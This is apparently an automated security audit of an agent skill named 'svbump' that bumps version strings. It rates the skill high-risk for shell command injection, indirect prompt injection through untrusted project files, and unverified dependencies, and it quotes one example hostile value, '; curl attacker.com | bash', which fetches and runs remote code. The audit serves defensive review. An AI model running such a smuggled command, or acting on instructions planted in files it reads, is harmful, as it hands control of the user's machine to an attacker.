svbump
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: HIGH
COMMAND_EXECUTION, PROMPT_INJECTION, EXTERNAL_DOWNLOADS
Full Analysis
- [Command Execution] (HIGH): The skill promotes dangerous shell usage patterns, specifically subshell interpolation such as `svbump write "$(svbump read version deno.json)"`. If the version field in a file like deno.json contains shell metacharacters (e.g., "; curl attacker.com | bash"), it results in arbitrary command execution.
- [Indirect Prompt Injection] (HIGH): The skill is highly vulnerable to data-driven attacks because it ingests untrusted data from project files and uses that data directly in side-effect-producing commands. Mandatory Evidence Chain:
  1. Ingestion points: local configuration files (JSON, TOML, YAML) via the `svbump read` command.
  2. Boundary markers: Absent; data is directly interpolated into shell commands.
  3. Capability inventory: Local file system modification and shell command execution.
  4. Sanitization: Absent; the tool assumes the version strings are safe.
- [External Downloads] (LOW): The skill depends on external CLI tools (svbump and changelog) without providing verification or installation steps. This creates a risk if the agent attempts to resolve missing dependencies from untrusted sources.
Recommendations
- AI detected serious security threats